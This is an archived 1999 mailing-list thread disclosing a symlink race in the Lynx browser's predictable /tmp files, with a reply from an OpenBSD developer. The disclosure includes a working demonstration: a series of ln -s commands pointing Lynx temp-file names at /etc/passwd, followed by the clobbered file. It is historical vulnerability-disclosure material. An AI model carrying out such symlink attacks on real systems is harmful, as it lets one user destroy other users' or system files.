Visit our newest sister site!
Hundreds of free aircraft flight manuals
Civilian • Historical • Military • Declassified • FREE!


TUCoPS :: Unix :: General :: lynxtmp.txt

Lynx creates files in /tmp creating a race condition that allows you to overwrite other users files.





[ http://www.rootshell.com/ ]

Date:         Tue, 9 Feb 1999 20:57:30 -0500
From:         Juan Diego Bolanos <diego@HERCULES.UNIVALLE.EDU.CO>
Subject:      Lynx /tmp problem

Hi Aleph,
please filter this if already posted....
------

Hello....

I have found a bug in Lynx all versions, except the latest stable
release...

lynx create temporary files in /tmp in this way....


L[num proc]-xTMP.html

where

[num proc] is the proc number in the machine
x is a number from 0 to 9

if i run lynx like any user, for example root we see this

earthworm:~$ ps
  PID TTY STAT  TIME COMMAND
   91   1 SW   0:06 (bash)
   94   4 S    0:05 -bash
   95   5 SW   0:06 (bash)
 3867  a3 S    0:00 pppd -detach defaultroute crtscts modem 192.168.2.6:
 3870   3 SW   0:02 (ssh)
 3894   4 T    0:00 lynx
 3898   4 R    0:00 ps

then the files in /tmp created by lynx will be..

L3894-0TMP.html
L3894-1TMP.html
L3894-2TMP.html
L3894-3TMP.html
L3894-4TMP.html
L3894-5TMP.html
L3894-6TMP.html
L3894-7TMP.html
L3894-8TMP.html
L3894-9TMP.html

if i make a symlink
from all of this files to any file in the system, for example....


earthworm:~$ cd /tmp
earthworm:/tmp$ ln -s /etc/passwd  L3894-0TMP.html
earthworm:/tmp$ ln -s /etc/passwd  L3894-1TMP.html
earthworm:/tmp$ ln -s /etc/passwd  L3894-2TMP.html
earthworm:/tmp$ ln -s /etc/passwd  L3894-3TMP.html
earthworm:/tmp$ ln -s /etc/passwd  L3894-4TMP.html
earthworm:/tmp$ ln -s /etc/passwd  L3894-5TMP.html
earthworm:/tmp$ ln -s /etc/passwd  L3894-6TMP.html
earthworm:/tmp$ ln -s /etc/passwd  L3894-7TMP.html
earthworm:/tmp$ ln -s /etc/passwd  L3894-8TMP.html
earthworm:/tmp$ ln -s /etc/passwd  L3894-9TMP.html

and now root (in this example) try to download a file, or press the
backspace key to reach the history list, the file i have linked (in this
case /etc/passwd) will be replaced with it... and now is owned by root...

for example i got this in my system...

earthworm:/tmp$ cat /etc/passwd

<head>
<title>Lynx History Page</title>
</head>
<body>
<h1>You have reached the History Page</h1>
<h2>Lynx Version 2.8rel2</h2>
<pre><em>You selected:</em>
  <em>0</em>. <tab id=t0><a href="LYNXHIST:0">Internet Firewalls Frequently Asked Questions</a>
<tab to=t0>file://localhost/root/firefaq.html
</pre>
</body>


like you see, the file is lost now...

this bug is lynx specific, so all OS are vulnerables..

Fix, upgrade to the latest lynx version, i have checked it, and it appear
to use a L[proc num]-xTMP.html where x is from 0 to ???...

i hope it is already fixed, creating 100 symlinks are not to hard :)

the lynx team know this yet.

by...


Juan Diego

-----------------------------------------------------------------------------

Date:         Thu, 11 Feb 1999 12:55:41 -0700
From:         Theo de Raadt <deraadt@CVS.OPENBSD.ORG>
Subject:      Re: Lynx /tmp problem

> this bug is lynx specific, so all OS are vulnerables..

OpenBSD ships with an integrated version of lynx.  Our version has
tweaks to avoid this issue.

We've brought this issue up with the lynx people before.  They do not
appear to give a damn.

That said, from reading the code I can see why they might not care --
this problem is going to be a complete nightmare to fix.  Lynx's
handling of /tmp is wrought with many races, and the code is pasta.


TUCoPS is optimized to look best in Firefox® on a widescreen monitor (1440x900 or better).
Site design & layout copyright © 1986-2014 AOH